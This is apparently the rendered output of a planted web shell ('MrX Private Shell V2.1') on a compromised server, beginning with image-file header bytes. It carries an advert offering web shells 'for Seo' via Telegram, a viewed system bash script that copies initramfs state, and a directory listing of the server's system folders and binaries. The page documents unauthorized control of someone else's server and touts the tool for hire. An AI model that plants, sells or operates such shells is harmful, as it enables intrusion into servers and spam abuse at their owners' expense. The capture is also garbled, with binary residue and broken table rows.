����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/bash
# import-state: import state files from initramfs (e.g. network config)
# Copy state into root folder:
# ============================
cd /run/initramfs/state
IFS_backup=$IFS
IFS=$'\n' # Process find's results line by line
dirs_found=$(find . -type d)
for dir in $dirs_found; do
pushd "$dir" > /dev/null
# Remove initial '.' char from the find's result:
dest_dir="${dir/\./}"
# Create destination folder if it does not exist (with the same rights):
if [[ -n "$dest_dir" && ! -d "$dest_dir" ]]; then
mkdir -p "$dest_dir"
chmod --reference="$PWD" "$dest_dir"
chown --reference="$PWD" "$dest_dir"
fi
# Copy all files that are not directory:
find . -mindepth 1 -maxdepth 1 -not -type d -exec cp -av -t "$dest_dir" {} \; > /dev/null
popd > /dev/null
done
IFS=$IFS_backup
# Run restorecon on the copied files:
# ===================================
if [ -e /sys/fs/selinux/enforce ] && [ -x /usr/sbin/restorecon ]; then
find . -mindepth 1 -print0 | { cd / && xargs --null restorecon -iF; }
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| awk | Folder | 0755 |
|
|
| coreutils | Folder | 0755 |
|
|
| cpanel-pdns | Folder | 0755 |
|
|
| dbus-1 | Folder | 0755 |
|
|
| dovecot | Folder | 0755 |
|
|
| fwupd | Folder | 0755 |
|
|
| gawk | Folder | 0755 |
|
|
| gcc | Folder | 0755 |
|
|
| getconf | Folder | 0755 |
|
|
| grubby | Folder | 0755 |
|
|
| hostname | Folder | 0755 |
|
|
| imunify-notifier | Folder | 0755 |
|
|
| initscripts | Folder | 0755 |
|
|
| installkernel | Folder | 0755 |
|
|
| linux-boot-probes | Folder | 0755 |
|
|
| man-db | Folder | 0755 |
|
|
| microcode_ctl | Folder | 0755 |
|
|
| nfs-utils | Folder | 0755 |
|
|
| openldap | Folder | 0755 |
|
|
| openssh | Folder | 0755 |
|
|
| os-prober | Folder | 0755 |
|
|
| os-probes | Folder | 0755 |
|
|
| p11-kit | Folder | 0755 |
|
|
| plymouth | Folder | 0755 |
|
|
| selinux | Folder | 0755 |
|
|
| smartmontools | Folder | 0755 |
|
|
| sssd | Folder | 0755 |
|
|
| sudo | Folder | 0755 |
|
|
| tuned | Folder | 0755 |
|
|
| udisks2 | Folder | 0755 |
|
|
| utempter | Folder | 0755 |
|
|
| audit-functions | File | 990 B | 0750 |
|
| dirmngr_ldap | File | 87.33 KB | 0755 |
|
| dnf-utils | File | 3.62 KB | 0755 |
|
| ebtables | File | 1.33 KB | 0755 |
|
| exim.daemon | File | 758 B | 0755 |
|
| generate-rndc-key.sh | File | 546 B | 0755 |
|
| gpg-check-pattern | File | 111.91 KB | 0755 |
|
| gpg-preset-passphrase | File | 87.23 KB | 0755 |
|
| gpg-protect-tool | File | 206.38 KB | 0755 |
|
| gpg-wks-client | File | 227.23 KB | 0755 |
|
| grepconf.sh | File | 253 B | 0755 |
|
| import-state | File | 1.03 KB | 0755 |
|
| imunify-message-gateway | File | 7.95 MB | 0755 |
|
| loadmodules | File | 233 B | 0755 |
|
| nfsrahead | File | 37.15 KB | 0755 |
|
| nm-daemon-helper | File | 12.6 KB | 0755 |
|
| nm-dhcp-helper | File | 16.2 KB | 0755 |
|
| nm-dispatcher | File | 66.16 KB | 0755 |
|
| nm-initrd-generator | File | 740.48 KB | 0755 |
|
| no-python | File | 157 B | 0755 |
|
| platform-python | File | 11.59 KB | 0755 |
|
| platform-python-config | File | 204 B | 0755 |
|
| platform-python3.6 | File | 11.59 KB | 0755 |
|
| platform-python3.6-config | File | 204 B | 0755 |
|
| platform-python3.6m | File | 11.59 KB | 0755 |
|
| platform-python3.6m-config | File | 204 B | 0755 |
|
| platform-python3.6m-x86_64-config | File | 3.54 KB | 0755 |
|
| report-command-error | File | 8.37 MB | 0755 |
|
| run-with-intensity | File | 6.36 MB | 0755 |
|
| scdaemon | File | 442.41 KB | 0755 |
|
| virt-what-cpuid-helper | File | 7.91 KB | 0755 |
|
| xb-tool | File | 24.78 KB | 0755 |
|